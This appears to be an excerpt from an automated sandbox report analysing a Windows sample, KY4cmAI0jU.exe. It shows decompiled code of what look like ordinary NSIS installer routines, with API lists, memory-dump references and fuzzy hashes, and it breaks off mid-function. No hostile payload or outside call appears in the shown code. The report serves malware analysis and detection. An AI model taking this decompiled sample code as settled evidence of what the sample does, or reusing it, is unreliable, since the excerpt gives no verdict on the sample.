                                                                                                        • lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
                                                                                                        • lstrcatA.KERNEL32(?,Call), ref: 004044CD
                                                                                                        • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                                          • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                                        • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                        • API String ID: 2246997448-2678639445
                                                                                                        • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                        • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                                        • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                                        • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 74%
                                                                                                        			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                                        0x00405b88
                                                                                                        0x00405b88
                                                                                                        0x00405b88
                                                                                                        0x00405b8e
                                                                                                        0x00405b93
                                                                                                        0x00405ba4
                                                                                                        0x00405ba4
                                                                                                        0x00405baf
                                                                                                        0x00405bb1
                                                                                                        0x00405bb6
                                                                                                        0x00405bb9
                                                                                                        0x00405bba
                                                                                                        0x00405bc1
                                                                                                        0x00405bc3
                                                                                                        0x00405bc9
                                                                                                        0x00405bcc
                                                                                                        0x00405bcc
                                                                                                        0x00405da5
                                                                                                        0x00405da5
                                                                                                        0x00405da9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405bd9
                                                                                                        0x00405bdf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405be5
                                                                                                        0x00405be6
                                                                                                        0x00405be9
                                                                                                        0x00405bec
                                                                                                        0x00405d98
                                                                                                        0x00405da2
                                                                                                        0x00405da4
                                                                                                        0x00405da4
                                                                                                        0x00405d9a
                                                                                                        0x00405d9c
                                                                                                        0x00405d9e
                                                                                                        0x00405d9f
                                                                                                        0x00405d9f
                                                                                                        0x00000000
                                                                                                        0x00405d98
                                                                                                        0x00405bf2
                                                                                                        0x00405bf6
                                                                                                        0x00405c06
                                                                                                        0x00405c0a
                                                                                                        0x00405c11
                                                                                                        0x00405c14
                                                                                                        0x00405c18
                                                                                                        0x00405c1e
                                                                                                        0x00405c21
                                                                                                        0x00405c24
                                                                                                        0x00405c27
                                                                                                        0x00405d42
                                                                                                        0x00405d45
                                                                                                        0x00405d75
                                                                                                        0x00405d78
                                                                                                        0x00405d7d
                                                                                                        0x00405d81
                                                                                                        0x00405d81
                                                                                                        0x00405d86
                                                                                                        0x00405d87
                                                                                                        0x00405d8c
                                                                                                        0x00405d8f
                                                                                                        0x00405d91
                                                                                                        0x00000000
                                                                                                        0x00405d91
                                                                                                        0x00405d47
                                                                                                        0x00405d4a
                                                                                                        0x00405d5f
                                                                                                        0x00405d66
                                                                                                        0x00405d4c
                                                                                                        0x00405d53
                                                                                                        0x00405d53
                                                                                                        0x00405d6e
                                                                                                        0x00405d71
                                                                                                        0x00405d3a
                                                                                                        0x00405d3b
                                                                                                        0x00405d3b
                                                                                                        0x00000000
                                                                                                        0x00405d71
                                                                                                        0x00405c2f
                                                                                                        0x00405c30
                                                                                                        0x00405c36
                                                                                                        0x00405c38
                                                                                                        0x00405c52
                                                                                                        0x00405c52
                                                                                                        0x00405c59
                                                                                                        0x00405c59
                                                                                                        0x00405c60
                                                                                                        0x00405c64
                                                                                                        0x00405c64
                                                                                                        0x00405c65
                                                                                                        0x00405c67
                                                                                                        0x00405ca0
                                                                                                        0x00405ca3
                                                                                                        0x00405cb3
                                                                                                        0x00405cb6
                                                                                                        0x00405cbe
                                                                                                        0x00405cc4
                                                                                                        0x00405cc4
                                                                                                        0x00405d20
                                                                                                        0x00405d20
                                                                                                        0x00405d22
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cc8
                                                                                                        0x00405ccf
                                                                                                        0x00405cd0
                                                                                                        0x00405cd2
                                                                                                        0x00405cec
                                                                                                        0x00405cfa
                                                                                                        0x00405d00
                                                                                                        0x00405d02
                                                                                                        0x00405d1d
                                                                                                        0x00405d1d
                                                                                                        0x00405d1d
                                                                                                        0x00000000
                                                                                                        0x00405d1d
                                                                                                        0x00405d08
                                                                                                        0x00405d13
                                                                                                        0x00405d19
                                                                                                        0x00405d1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405d1b
                                                                                                        0x00405cd4
                                                                                                        0x00405cd7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405ce6
                                                                                                        0x00405ce8
                                                                                                        0x00405cea
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cea
                                                                                                        0x00000000
                                                                                                        0x00405d20
                                                                                                        0x00405cab
                                                                                                        0x00000000
                                                                                                        0x00405c69
                                                                                                        0x00405c6e
                                                                                                        0x00405c84
                                                                                                        0x00405c89
                                                                                                        0x00405c8c
                                                                                                        0x00405d29
                                                                                                        0x00405d29
                                                                                                        0x00405d2d
                                                                                                        0x00405d35
                                                                                                        0x00405d35
                                                                                                        0x00000000
                                                                                                        0x00405d2d
                                                                                                        0x00405c96
                                                                                                        0x00405d24
                                                                                                        0x00405d24
                                                                                                        0x00405d27
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405d27
                                                                                                        0x00405c67
                                                                                                        0x00405c3a
                                                                                                        0x00405c3e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405c40
                                                                                                        0x00405c44
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405c46
                                                                                                        0x00405c4a
                                                                                                        0x00000000
                                                                                                        0x00405c4c
                                                                                                        0x00405c4c
                                                                                                        0x00000000
                                                                                                        0x00405c4c
                                                                                                        0x00405c4a
                                                                                                        0x00405daf
                                                                                                        0x00405db9
                                                                                                        0x00405dc5
                                                                                                        0x00405dc5
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                                        • lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                        • API String ID: 900638850-1230650788
                                                                                                        • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                        • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                                        • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                                        • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 74%
                                                                                                        			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                                        0x00402029
                                                                                                        0x00402033
                                                                                                        0x0040203c
                                                                                                        0x00402046
                                                                                                        0x0040204f
                                                                                                        0x00402059
                                                                                                        0x0040205d
                                                                                                        0x0040205d
                                                                                                        0x00402062
                                                                                                        0x00402073
                                                                                                        0x0040207b
                                                                                                        0x0040215b
                                                                                                        0x0040215b
                                                                                                        0x00402162
                                                                                                        0x00402081
                                                                                                        0x00402081
                                                                                                        0x00402092
                                                                                                        0x00402096
                                                                                                        0x0040209c
                                                                                                        0x004020a6
                                                                                                        0x004020a8
                                                                                                        0x004020b3
                                                                                                        0x004020b6
                                                                                                        0x004020c3
                                                                                                        0x004020c5
                                                                                                        0x004020c7
                                                                                                        0x004020ce
                                                                                                        0x004020d1
                                                                                                        0x004020d1
                                                                                                        0x004020d4
                                                                                                        0x004020de
                                                                                                        0x004020e6
                                                                                                        0x004020eb
                                                                                                        0x004020f7
                                                                                                        0x004020f7
                                                                                                        0x004020fa
                                                                                                        0x00402103
                                                                                                        0x00402106
                                                                                                        0x0040210f
                                                                                                        0x00402114
                                                                                                        0x00402126
                                                                                                        0x00402135
                                                                                                        0x00402137
                                                                                                        0x00402143
                                                                                                        0x00402143
                                                                                                        0x00402135
                                                                                                        0x00402145
                                                                                                        0x0040214b
                                                                                                        0x0040214b
                                                                                                        0x0040214e
                                                                                                        0x00402154
                                                                                                        0x00402159
                                                                                                        0x0040216e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402159
                                                                                                        0x00402164
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                        • API String ID: 123533781-501415292
                                                                                                        • Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                        • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                        • Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                                        • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 39%
                                                                                                        			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                        0x00402656
                                                                                                        0x0040266a
                                                                                                        0x00402675
                                                                                                        0x00402676
                                                                                                        0x004027b1
                                                                                                        0x00402658
                                                                                                        0x00402658
                                                                                                        0x0040265a
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID:
                                                                                                        • API String ID: 1974802433-0
                                                                                                        • Opcode ID: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                        • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                        • Opcode Fuzzy Hash: fec3e59c21f88b2afe0d858e3cd58f666a30441cfee8bf2827fa80150cba7d73
                                                                                                        • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403A45, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E00403A45(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x420484 = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420498 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f460 = _t91;
						E00403F18(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420484 = 1;
					}
					_t122 =  *0x4091c4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F64(0x40b);
						while(1) {
							_t37 =  *0x420484;
							 *0x4091c4 =  *0x4091c4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091c4; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405B88(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F18(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F18(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403F3A(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f460, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420498);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f460);
							}
							E00403F4D();
							E00405B66(0x4204a0, 0x4236a0);
							E00405B88(0x4204a0, _t125, _t130,  &(0x4204a0[lstrlenA(0x4204a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x4204a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc70 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
